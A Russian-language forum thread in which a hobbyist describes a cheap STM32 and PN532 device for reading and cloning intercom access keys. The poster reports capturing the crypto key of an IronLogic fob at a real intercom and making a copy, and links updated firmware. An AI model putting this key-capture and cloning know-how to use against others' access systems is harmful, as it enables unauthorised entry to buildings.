svk4286 2 Жалоба Опубликовано 27 июня, 2019 хотелось бы видеть подобное на платформе уже с usb и портами терминала на борту . выбор STM32F103C8T6 более чем странный .А зачем изобретать ещё один proxmark,Chameleon или SMKey?Они уже существуют,продаются и используются.У меня же задача была сделать что-то подобное,но на "соплях" и "из говна и палок",максимально бюджетно.Исходя из этого и были выбраны комплектующие,причем мощности STM32F103C8T6 для данной задачи вполне хватает,а стоит эта отладочная плата дешевле(ну или примерно также) ардуины.По большому счету эта фигня свою задачу для меня уже выполнила - криптоключ для таблетки от IronLogic получен,дамп снят,копия сделана,пусть и пришлось попрыгать у домофона.Ну,а если эта тема никому не интересна,то и бросить не долго.Я не занимаюсь изготовлением ключей,не преследую каких-либо коммерческих целей,и вожусь с этим только из интереса. Цитата Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
apple 6 Жалоба Опубликовано 27 июня, 2019 можно и uno было взять Цитата Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
svk4286 2 Жалоба Опубликовано 27 июня, 2019 можно и uno было взять Нельзя было,поверьте. Цитата Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
apple 6 Жалоба Опубликовано 28 июня, 2019 на avr studio все работает . библиотека есть . Цитата Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
svk4286 2 Жалоба Опубликовано 28 июня, 2019 на avr studio все работает . библиотека есть .Интересно,дайте ссылку.И "чтобы два раза не вставать" - нашел причину(даже две),по которой плохо считывалось с реального домофона.Первая - оказался бракованный модуль PN532,после замены ситуация в корне изменилась.Вторая - выявилась разница в работе реальной считки и PN532+Arduino.После корректировки прошивки считываться стало нормально.Сегодня провел вторые полевые испытания - всё удалось прекрасно.Обновил пост https://ikey.ru/foru...dpost__p__21822 и архив с прошивкой.Кстати для прошивки STM32 не обязательно покупать ST-Link, это можно сделать и имеющимся USB-UART переходником.Подробно описано вот здесь https://habr.com/ru/post/395577/ , причем заливать надо сразу прошивку из архива, загрузчик Arduino прошивать не надо.P.S. И имейте ввиду - "Не все модули PN532 одинаково полезны!".Из трёх имеющихся у меня,один плохо читает некоторые карты,но хорошо таблетки, другой наоборот - все имеющиеся у меня карты читает хорошо,а таблетки только выборочно, третий прекрасно справлялся со всеми моими картами и таблетками,но облажался при работе в пассивном режиме с реальными домофонами.Хотя может только мне не повезло? Цитата Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты